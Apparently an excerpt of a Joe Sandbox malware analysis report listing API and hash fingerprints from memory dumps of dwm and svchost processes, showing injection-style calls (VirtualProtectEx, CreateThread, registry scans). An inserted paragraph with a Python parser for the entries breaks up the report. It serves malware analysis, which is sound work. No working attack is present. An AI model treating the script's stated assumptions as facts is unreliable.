                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002BAAF22093F,?,?,?,000002BAAF21E263), ref: 000002BAAF220A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002BAAF22093F,?,?,?,000002BAAF21E263), ref: 000002BAAF220B0A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 22628d253f4b2124741ef3d755309fd324007fa4989dfa84a4d75b1062aadd95
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: A881D13361065089FB68DB6488B87ED77B1F748B98F444115DE0AE77A1EB36844AC732
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 452c4da48bc17cec2e35f21799188dc8555b2eac98ca7fdb2052e490eff5b469
                                                        • Instruction ID: c570d6d1b000993b898d88c015bb25e368b99221ccd65f3ac4dfc0790bec377e
                                                        • Opcode Fuzzy Hash: 452c4da48bc17cec2e35f21799188dc8555b2eac98ca7fdb2052e490eff5b469
                                                        • Instruction Fuzzy Hash: 06610C33119B44C6EB68CF15E46931AB7B0F388784F500155EA8E87BA8DB7EC548CF19
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 7097b8acd0b530d4b0a9a6d0ff9f2f11ec16afe7dad8c1a911792a3322799ef8
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: CA118623A54A1101F75C1724D47E37973606B75374F044634AE76DA3E68B5B8E8DC133
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 9d670050d6ab185e45e66283b4d120b581601cfb19ab76edf0a6d8a8a3486fc4
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 7F11CE73A40B1081F76C1228E45E3A93B706BF4774F480627EB76B66DADB1A8841C722
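The two _set_statfp entries above carry the same Opcode ID (26a546e7…) but come from two different memory dumps of the same process (base offsets 000002BAAF1E0000 and 000002BAAF210000), which is the kind of cross-dump overlap an analyst wants surfaced automatically. The following Python script is an added example, not part of the Joe Sandbox report or its plugin: it parses fingerprint entries in the text layout used on this page into records, lists Opcode IDs that occur in more than one dump, and matches String IDs against a watchlist (the named-pipe prefix and mscoree.dll seen in nearby entries). The sample text is an abridged copy of three entries from this page. Two assumptions are made and marked in the code: that the first dotted field of a dump file name is the PID in hex (0x10 here, which agrees with the "_16_" in the snapshot file name), and that the report joins several strings in one String ID with "$" (as in "CorExitProcess$mscoree.dll").

```python
import re
from collections import defaultdict

# Constructed sample: three abridged entries copied from this report (CombinePath, and
# the _set_statfp routine that was fingerprinted in two separate dumps of PID 0x10).
SAMPLE = r"""
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
• Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
APIs
Memory Dump Source
• Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
APIs
Memory Dump Source
• Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
"""

SECTION_HEADERS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
SOURCE_RE = re.compile(r"Source File:\s*(\S+?\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+)")
ASSOC_RE = re.compile(r"Associated:\s*(\S+?\.sdmp)")  # non-greedy: drops a glued "Download File" label
FIELD_RE = re.compile(r"^([A-Za-z ]+?):\s*(.*)$")

def parse_entries(text):
    """One dict per fingerprint entry; an entry begins at each 'APIs' header line."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":
                cur = {"apis": [], "strings": [], "associated": [], "fields": {}}
                entries.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section in ("APIs", "Strings"):
            cur[section.lower()].append(body)  # e.g. "GetConsoleMode.KERNEL32(...), ref: 000002BAAF220A80"
        elif section == "Memory Dump Source":
            if m := SOURCE_RE.search(body):
                cur["dump"], cur["offset"] = m.group(1), int(m.group(2), 16)
                # Assumption: the first dotted field of the dump name is the PID in hex
                # (0x10 here, consistent with the "_16_" in the snapshot file name).
                cur["pid"] = int(m.group(1).split(".")[0], 16)
            elif m := ASSOC_RE.search(body):
                cur["associated"].append(m.group(1))
        elif m := FIELD_RE.match(body):  # "Joe Sandbox IDA Plugin" and "Similarity" key/value lines
            cur["fields"][m.group(1)] = m.group(2).strip()
    return entries

def shared_across_dumps(entries):
    """Opcode IDs seen in more than one dump, with the base offsets of those dumps."""
    seen = defaultdict(set)
    for e in entries:
        op = e["fields"].get("Opcode ID")
        if op and "offset" in e:
            seen[op].add(e["offset"])
    return {op: sorted(offs) for op, offs in seen.items() if len(offs) > 1}

def entries_referencing(entries, needles):
    """Entries whose String ID (assumed '$'-joined list of strings) contains any needle."""
    hits = []
    for e in entries:
        strings = [s for s in e["fields"].get("String ID", "").split("$") if s]
        if any(n in s for s in strings for n in needles):
            hits.append(e)
    return hits

if __name__ == "__main__":
    entries = parse_entries(SAMPLE)
    for op, offs in shared_across_dumps(entries).items():
        print(f"{op[:16]}... in {len(offs)} dumps: " + ", ".join(f"0x{o:X}" for o in offs))
    for e in entries_referencing(entries, ["\\\\.\\pipe", "mscoree.dll"]):
        print(e["fields"]["API ID"], "references", e["fields"]["String ID"])
```

Run as a script it reports the _set_statfp opcode at 0x2BAAF1E0000 and 0x2BAAF210000 and the CombinePath entry that references \\.\pipe\. To use it on the full report, paste the fingerprint section into SAMPLE or read it from a file; grouping on Opcode ID rather than Instruction ID is deliberate, since the Instruction ID differs between the two copies while the Opcode ID is identical.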
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: 7aaadda06542fe4e4acc22baabab240a0e73d413edf737f765fdd66a223f3998
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: 59116A26300A8191FF389B25E82939A73B5F788780F500121DE49C3A94EF3ACD09C76E
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: d41a58d153652720a5ec27ddd0e6e873cf0f79565136c1956944f6c6c61b611d
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: 8D011A33611B90C6E718DFA6E81829977B1F788F84F084425EA4A93728DF39C859C755
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: 582f9027be96268d194dcb6bee9941c93b8b42454e5c21d2fe54859b00c74d0c
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: EF71813360078186EF7C9F2698683AA77B5F385784F450025ED4993B98DF36CA09C76E
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: f0af33db4e1575e7fb6d00d73accf7bb8c0e10e1a2b89e4c6dbe87231cd6418d
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: 9E616A6360064582FAAD9B19D15833EBFB4F791B80F14481BDB0A977A8DB3BC841C332
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: e8639d5fbed36d3742fc3bb2bd07fadf728fb44a619c533cc13aa27e372503a6
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: 5E518D3320878551EE7CDE25A1BC3AA7775F385780F440025EE4983B89DB3AC908D75E
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: 37d427d7877672c6359396deda68cdd5fe6c8c06a1101931b830fae45d784dc9
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: 6141A033614A4482EB24DF25E8583AA77B1F798794F814021EE4DC7798EB39C549CB62
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 0d0e01c185eccc3dd7ce781cfc4c52b0c07a5d9784f0925fe970f4753a945d71
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: 81114732608B80C6DB64CB56F49429AB7B4F7C9B84F54412AEE8D83B59CF38C518CB04
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 4e3e5ba4fd33e08099070b5b44bf6dcb4b0c40132ea89adbf06006fdee3614f2
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 77113632618B8082EB258F25E454359B7A4F788B94F188220EF8C47B68DF3EC955CB54
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: 63340a853cb01489453e0ffa3a10237ba9bea2044928fce77fc3b315f2950c6c
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: 88F08237304B80C2FB2C9B95F8586997370AB48B90F944525E90943B95CF3AC94DCB66
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 000002BAAF21D751
                                                        • TlsSetValue.KERNEL32(?,?,?,000002BAAF21B50E,?,?,?,000002BAAF21B969,?,?,?,?,000002BAAF21BA1D), ref: 000002BAAF21D768
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 0000026A879C3631
                                                        • PathFindFileNameW.SHLWAPI ref: 0000026A879C3640
                                                          • Part of subcall function 0000026A879C3C70: StrCmpNIW.SHLWAPI(?,?,?,0000026A879C255A), ref: 0000026A879C3C88
                                                          • Part of subcall function 0000026A879C3BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3BC6
                                                          • Part of subcall function 0000026A879C3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3BF4
                                                          • Part of subcall function 0000026A879C3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3C16
                                                          • Part of subcall function 0000026A879C3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3C34
                                                          • Part of subcall function 0000026A879C3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3C55
                                                        • CreateThread.KERNELBASE ref: 0000026A879C3687
                                                          • Part of subcall function 0000026A879C1D3C: GetCurrentThread.KERNEL32 ref: 0000026A879C1D47
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 0000026A879C1628: GetProcessHeap.KERNEL32 ref: 0000026A879C1633
                                                          • Part of subcall function 0000026A879C1628: HeapAlloc.KERNEL32 ref: 0000026A879C1642
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16B2
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DF
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C16F9
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1719
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1734
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1754
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C176F
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C178F
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17AA
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17CA
                                                        • SleepEx.KERNELBASE ref: 0000026A879C1AE3
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17E5
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1805
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1820
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1840
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C185B
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C187B
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1896
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C18A0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
